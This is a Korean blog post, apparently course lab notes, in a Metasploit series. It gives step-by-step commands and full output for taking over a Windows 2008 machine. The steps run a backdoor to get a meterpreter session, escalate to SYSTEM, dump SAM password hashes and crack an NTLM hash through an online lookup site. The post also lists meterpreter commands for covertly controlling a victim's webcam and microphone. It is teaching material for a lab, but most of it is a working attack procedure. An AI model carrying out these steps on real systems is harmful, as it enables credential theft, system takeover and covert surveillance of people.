[실습] password the hash(hash dump)
<!--[if !supportEmptyParas]--> <!--[endif]-->
■ 사용시스템
- KaliLinux
- windows 2008
<!--[if !supportEmptyParas]--> <!--[endif]-->
(windows 2008)
<!--[if !supportEmptyParas]--> <!--[endif]-->
(선수작업) 윈도우 2008 사용자
(EX: soldesk)의 암호를 쉬운 암호로 변경한다.
(기존 암호) ==> (새로운 암호) 123
시작 > 관리도구 > 로컬 보안 정책
보안 설정 > 계정 정책 > 암호 정책 >
"암호는 복잡성을 만족해야 함" 부분이 "사용 안 함"으로 설정 되어 있는지 확인
<!--[if !supportEmptyParas]-->
<!--[endif]-->
시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 >
soldesk 사용자를 선택하고 오른쪽 마우스를 클릭
암호 설정 > 계속 > 새암호(EX: 123)
(KaliLinux)
# netstat -an | grep :5432
# service postgresql start
# cd /root/bin ; msfconsole -r reverse_resource2.rc
msf > sessions -l
msf > sessions -i 1
meterpreter >
(Windows2008)
바탕화면에 backdoor.exe 파일 실행
<!--[if !supportEmptyParas]--> <!--[endif]-->
① 패스워드 해시 덤프(password hash dump)
meterpreter > help ..... (중략) ..... Priv: Password database Commands ================================ <!--[if !supportEmptyParas]--> <!--[endif]--> Command Description ------- ----------- hashdump Dumps the contents of the SAM database ..... (중략) ..... <!--[if !supportEmptyParas]--> <!--[endif]--> meterpreter > getuid Server username: soldesk-PC\soldesk meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM <--관리자 권한 실행 모드 Win Logon 으로 마이그레이션 되어 있는 권한이 가장 높은 권한(Windows) meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY fc7bdca7a24bf26b95d5b3485ad7469f... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... <!--[if !supportEmptyParas]--> <!--[endif]--> soldesk:"soldesk1." <!--[if !supportEmptyParas]--> <!--[endif]--> [*] Dumping password hashes... <!--[if !supportEmptyParas]--> <!--[endif]--> <!--[if !supportEmptyParas]--> <!--[endif]--> Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: soldesk:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678::: 해쉬 알고리즘 : 어떠한 글자 수 라도 일정한 길이의 암호화 키를 가짐/복호화 불가능 <!--[if !supportEmptyParas]-->
<!--[endif]--> meterpreter > exit [*] Shutting down Meterpreter... <!--[if !supportEmptyParas]--> <!--[endif]--> [*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > exit |
② 패스워드 크랙
SAM 파일로 부터 추출된 패스워드 해시를 크랙하는 대표적인 툴
- 존더리퍼(John The Ripper), pwdump, rainbow crack 등
실습에서는 NTLM/LM 해시를 복호화는 MD5Decrypter.co.uk(http://www.md5decrypter.co.uk) 사이트를 사용한다.
<!--[if !supportEmptyParas]--> <!--[endif]-->
웹 브라우저를 실행하고 다음 사이트로 이동한다.
http://www.md5decrypter.co.uk (http://www.hashkiller.co.uk/)
-> 상단에 "Decrypter/Cracker" 선택
-> "NTLM Decrypter" 선택
<!--[if !supportEmptyParas]-->
<!--[endif]-->
3dbde697d71690a769204beb12283678 -> 123
복잡한 패스워드는 온라인 데이터베이스에는 없는 해시를 생성한다.
따라서 이런경우에는 레인보우 테이블 기반 크랙 도구를 사용하는 것을 고려해야 한다.
http://www.md5decrypter.co.uk 사이트는 아주 많은 해시 데이터베이스를 가지고 일치하는 패스워드를 찾는다.
이 방법은 간단하고 취약한 패스워드를 크랙하는데 매우 효과적이고 빠른 기법이다.
레인보우 테이블 : 암호화된 문자의 경우의수를 DB로 미리 만들어 놓은 파일
레인보우 크랙 : 미리 만들어져 있는 레인보우 테이블과 위에서 얻은 암호화 키를 비교작업
[추가적인 실습]
웹캠제어
노트북에 장착이 되어 있는 웹캠 디바이스를 칼리 리눅스에서 제어해 보자.
사용하는 명령어는 다음과 같다.
webcam_list 설치돼 있는 웹캠의 정보를 가져온다.
webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다.
webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다.
webcam_stop 웹캠의 실행을 중지한다.
webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다.
다른 장치(기기)에 대해서도 위험성에 대해 논의한다.
- 스마트 TV
- 핸드폰
- 건물내 감시카메라
사물인터넷과의 연계성에 대해서 논의한다.
'Learning > └◆Metasploit' 카테고리의 다른 글
metasploit 14. 윈도우즈 환경에서 Metasploit 다운로드 (0) | 2017.01.06 |
---|---|
metasploit 13. 메타스플로잇 업데이트(msfupdate CMD) (0) | 2017.01.06 |
metasploit 11. 키보드 스니핑과 스크린샷 (0) | 2017.01.05 |
metasploit 10. 윈도우 2008 로그 삭제 (0) | 2017.01.05 |